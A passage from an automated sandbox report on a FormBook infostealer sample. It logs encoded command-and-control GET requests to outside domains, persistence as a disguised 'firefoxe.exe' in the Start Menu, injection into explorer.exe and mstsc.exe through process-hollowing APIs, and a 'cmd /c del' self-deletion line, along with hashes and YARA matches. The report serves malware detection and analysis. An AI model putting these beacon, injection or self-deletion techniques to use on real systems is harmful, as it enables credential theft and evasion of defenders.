                                        0 | 192.168.2.3 | 49743 | 198.185.159.141 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Nov 20, 2020 16:33:34.833543062 CET | 6320 | OUT | GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1
                                        Host: www.ghoster.agency
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 20, 2020 16:33:34.942893982 CET | 6321 | IN | HTTP/1.1 400 Bad Request
                                        content-length: 77564
                                        expires: Thu, 01 Jan 1970 00:00:00 UTC
                                        pragma: no-cache
                                        cache-control: no-cache, must-revalidate
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        date: Fri, 20 Nov 2020 15:33:34 UTC
                                        x-contextid: Bwdk82gG/KU21r2Fa
                                        server: Squarespace
                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.3 | 49744 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Nov 20, 2020 16:33:44.590300083 CET | 6402 | OUT | GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1
                                        Host: www.jibenentreprenad.mobi
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 20, 2020 16:33:44.781363964 CET | 6403 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: nginx/1.16.1
                                        Date: Fri, 20 Nov 2020 15:33:44 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Memory Usage

                                        High Level Behavior Distribution

                                        Behavior

                                        System Behavior

                                        General

                                        Start time: 16:31:41
                                        Start date: 20/11/2020
                                        Path: C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit): true
                                        Commandline: 'C:\Users\user\Desktop\kayx.exe'
                                        Imagebase: 0xec0000
                                        File size: 432640 bytes
                                        MD5 hash: A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: .Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation: low

                                        General

                                        Start time: 16:32:45
                                        Start date: 20/11/2020
                                        Path: C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit): false
                                        Commandline: C:\Users\user\Desktop\kayx.exe
                                        Imagebase: 0x200000
                                        File size: 432640 bytes
                                        MD5 hash: A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Reputation: low

                                        General

                                        Start time: 16:32:46
                                        Start date: 20/11/2020
                                        Path: C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit): false
                                        Commandline: C:\Users\user\Desktop\kayx.exe
                                        Imagebase: 0x2c0000
                                        File size: 432640 bytes
                                        MD5 hash: A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Reputation: low

                                        General

                                        Start time: 16:32:46
                                        Start date: 20/11/2020
                                        Path: C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit): true
                                        Commandline: C:\Users\user\Desktop\kayx.exe
                                        Imagebase: 0x400000
                                        File size: 432640 bytes
                                        MD5 hash: A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation: low

                                        General

                                        Start time: 16:32:49
                                        Start date: 20/11/2020
                                        Path: C:\Windows\explorer.exe
                                        Wow64 process (32bit): false
                                        Commandline:
                                        Imagebase: 0x7ff714890000
                                        File size: 3933184 bytes
                                        MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: C, C++ or other language
                                        Reputation: high

                                        General

                                        Start time: 16:32:52
                                        Start date: 20/11/2020
                                        Path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
                                        Wow64 process (32bit): true
                                        Commandline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
                                        Imagebase: 0x9a0000
                                        File size: 432640 bytes
                                        MD5 hash: A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: .Net C# or VB.NET
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 46%, ReversingLabs
                                        Reputation: low

                                        General

                                        Start time: 16:33:00
                                        Start date: 20/11/2020
                                        Path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
                                        Wow64 process (32bit): true
                                        Commandline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
                                        Imagebase: 0x3e0000
                                        File size: 432640 bytes
                                        MD5 hash: A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges: true
                                        Has administrator privileges: true
                                        Programmed in: .Net C# or VB.NET
                                        Reputation: low

                                        General

                                        Start time:16:33:05
                                        Start date:20/11/2020
                                        Path:C:\Windows\SysWOW64\mstsc.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\mstsc.exe
                                        Imagebase:0x3f0000
                                        File size:3444224 bytes
                                        MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:16:33:08
                                        Start date:20/11/2020
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\kayx.exe'
                                        Imagebase:0xbd0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:16:33:09
                                        Start date:20/11/2020
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6b2800000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                          Executed Functions

                                          APIs
                                          • GetUserNameA.ADVAPI32(00000000), ref: 05C4CA6C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 05C4AB55
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: SectionUnmapView
                                          • String ID:
                                          • API String ID: 498011366-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 05C4AB55
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: SectionUnmapView
                                          • String ID:
                                          • API String ID: 498011366-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C4AE86
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C4AE86
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetUserNameA.ADVAPI32(00000000), ref: 05C4CA6C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CopyFileW.KERNELBASE(?,00000000,?), ref: 05C42379
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05C4A9B0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05C4A9B0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CopyFileW.KERNELBASE(?,00000000,?), ref: 05C42379
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 05C4A7F6
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C4AA90
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 05C4A7F6
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C4AA90
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C4A8C6
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C4A8C6
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: 8v
                                          • API String ID: 0-1830031809
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          • Instruction Fuzzy Hash: B741D038B04244CFC7949B75E46466A33F2EB8631CB2148B9D902CB761EB36CDC6CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff8a4e2f86ebc6fd6ced6c93c3c978af74330ebe3f963a5efd057577686fac3a
                                          • Instruction ID: 66dc9bb81b7a6b565ccc7c509ce7922086a69bb5bfa156223146365d45094084
                                          • Opcode Fuzzy Hash: ff8a4e2f86ebc6fd6ced6c93c3c978af74330ebe3f963a5efd057577686fac3a
                                          • Instruction Fuzzy Hash: 53316D74908288CFDB91CB99C185BDC7FB0EB05328FE55295DC56DF296E3349A8ACB01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ddde1fd04cfafe81461cdb1cf7ab27dac41263190f7e5cde236580b13c1b1f1a
                                          • Instruction ID: bcd19f7b73b8fbaa489f73cd5ea27c1831b32fc76ebf323b044080c55d32bc7a
                                          • Opcode Fuzzy Hash: ddde1fd04cfafe81461cdb1cf7ab27dac41263190f7e5cde236580b13c1b1f1a
                                          • Instruction Fuzzy Hash: D23133343041108FD7A4DB29D558B2ABBE2EF89718F6601A9E506CF3B1EA71ED44CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a7c4028f76f5440f76774c33eddd4d633292f9457bdf410daa81146bcaedee9e
                                          • Instruction ID: d0684ec6ac1fbf17dd7881e72b63703002c839c77806dee21ff9a1872e0a5017
                                          • Opcode Fuzzy Hash: a7c4028f76f5440f76774c33eddd4d633292f9457bdf410daa81146bcaedee9e
                                          • Instruction Fuzzy Hash: E1318D34618248CFFBF64BA9E00C3653BA4EB0131DF18456AEA07C6495F7798AC4CB63
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbbea0c86969b1f43f10e0eb60207fd4d80fba6e0c51c4050b54a148832658f3
                                          • Instruction ID: 9e4cb3b7f1fc1fa2e22198f91d01bf1feaa52bec1d5e260498cc21e4766db100
                                          • Opcode Fuzzy Hash: fbbea0c86969b1f43f10e0eb60207fd4d80fba6e0c51c4050b54a148832658f3
                                          • Instruction Fuzzy Hash: 4B21057110C785CFC3628B28D8683627FB1EF43314F0948AEC442CB6A2D7695D49C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30ea3b06239cf87bfff1579b5a687baed4504665c8d193739ebb0f69e8eaa63e
                                          • Instruction ID: 72a5a34ae0a0465de20e4cdfa9d28ff9251f3bb4692397fde78a04754557e7ab
                                          • Opcode Fuzzy Hash: 30ea3b06239cf87bfff1579b5a687baed4504665c8d193739ebb0f69e8eaa63e
                                          • Instruction Fuzzy Hash: 5721B035304108DFCB80CBAAD988AF97FB2EF44318B0140A1EE15DB661E728EE45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 179f2266855bcb71ea458a90e3bad786fec6789b58144d8b3e4d69f65aaadefd
                                          • Instruction ID: f75ee91a3b6d5cba051018755cf16b2c2b369a2d463fd275bae6fd63aa6961fc
                                          • Opcode Fuzzy Hash: 179f2266855bcb71ea458a90e3bad786fec6789b58144d8b3e4d69f65aaadefd
                                          • Instruction Fuzzy Hash: E7116D30A0810CCBD7E49A59845CBBEBBF6EB4974CF5540AADC07EB351CA609F008B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f567f57ce21a2a3b1426f8ea6ea4fa8dc4130f4c185229f1c127404adbe926f
                                          • Instruction ID: 55e37c06358ec65a0eeba4d71c21bb0174aa3b66bb2e3ab49f616e5a4811ff78
                                          • Opcode Fuzzy Hash: 0f567f57ce21a2a3b1426f8ea6ea4fa8dc4130f4c185229f1c127404adbe926f
                                          • Instruction Fuzzy Hash: 1621A5B150C288DFE7A68BA8A4193663FA1E70131DF14825EFA47C6885F7648BC4CB43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48ed07d444d18910ef352c1b83fc7e18856c26a1d0128c6fb1c67895bc9bbd47
                                          • Instruction ID: ba39ad5decad49bbcdfb7f6254df6b4e6786b85aff95ef93effe099e3ec566fd
                                          • Opcode Fuzzy Hash: 48ed07d444d18910ef352c1b83fc7e18856c26a1d0128c6fb1c67895bc9bbd47
                                          • Instruction Fuzzy Hash: 2A1184B1508148DBEBB64BA9B00936A3FA5E70131DF04811EFE07C5888F7648BC0CB53
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b8fd29a97ae89b6d63b19cc5216c843ed03fbef0d43767ae0700670616c1ecd
                                          • Instruction ID: ceaa469a5c841b4f2affa2ceaab2922964af5765c8a5354c8eff46ef48c1f3df
                                          • Opcode Fuzzy Hash: 9b8fd29a97ae89b6d63b19cc5216c843ed03fbef0d43767ae0700670616c1ecd
                                          • Instruction Fuzzy Hash: 3F119E30A0820DDFDBE59A24801CBBEBBF1EB8934CF51006ADD06EB251CB714F018B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9671845298801a75c502760ca8da707e84068fcee76efd2f6a6974f8689657eb
                                          • Instruction ID: 320e15a30210cb291c3017d443802341deeae95fe68c30d84d91bb163b79e3cc
                                          • Opcode Fuzzy Hash: 9671845298801a75c502760ca8da707e84068fcee76efd2f6a6974f8689657eb
                                          • Instruction Fuzzy Hash: 5501DF3150E769CB8BE2222C08212B926E4D68539C76501E3FC83FB652D5518F0183F2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e8c25b8e2d25ece9e901626fc44f2e64bca44893540a5e98f2a7e3c8d5cd81b6
                                          • Instruction ID: 214d4d3fa1e28465d664afb250fc82fe495a05f98153d1bef78945ecd114363b
                                          • Opcode Fuzzy Hash: e8c25b8e2d25ece9e901626fc44f2e64bca44893540a5e98f2a7e3c8d5cd81b6
                                          • Instruction Fuzzy Hash: 7701223830C209DF87989B7AE8544757BE6EF8034C311416AFD17CB312CB2A9E088F22
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e5f807965654f46b391fafa4d255201bc46d9a680907670129c160bb31ccf21
                                          • Instruction ID: 5328f1cb26e8f8b584f1a6df8836e5131baff95fc8b1d66acdb6f090cc79dab5
                                          • Opcode Fuzzy Hash: 9e5f807965654f46b391fafa4d255201bc46d9a680907670129c160bb31ccf21
                                          • Instruction Fuzzy Hash: DF115B74A04209CFEB91DFA8D898AAEBBF1FF49310F208559E811EB364D7349941CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 66e1749e1fedfc228c6a294da578b29d5f47f603210d2710416f874052c8aa7f
                                          • Instruction ID: 5d5d83c833b294924f973c195a9d8ac59196fdd36df864367adc0e420cb4db42
                                          • Opcode Fuzzy Hash: 66e1749e1fedfc228c6a294da578b29d5f47f603210d2710416f874052c8aa7f
                                          • Instruction Fuzzy Hash: CF11C634608248CBD784DB66C898BF97F72EF4030CB055454C902DBA91EB3C9E85C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfdf57b63427fceadbf86e56996575c1e84487c62d9ebffdae3fa8ca05409c46
                                          • Instruction ID: 6bc021036436ca07a976fd3836a25ed1e35b8ad7fb79e7136838e42d70495da2
                                          • Opcode Fuzzy Hash: cfdf57b63427fceadbf86e56996575c1e84487c62d9ebffdae3fa8ca05409c46
                                          • Instruction Fuzzy Hash: 7611C234A08349DFD7D5DFAAA40226DBBF2FB81314F14C4AEC906CB225F6358B918B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8897f8abf83c7149313d9e838acf1974ade9b4d2979f4c72e1e9de67276f5f32
                                          • Instruction ID: 73f04ceaa7353a48572a01ed4d5cab90a5726eea250cb037a571cf2fbac846bf
                                          • Opcode Fuzzy Hash: 8897f8abf83c7149313d9e838acf1974ade9b4d2979f4c72e1e9de67276f5f32
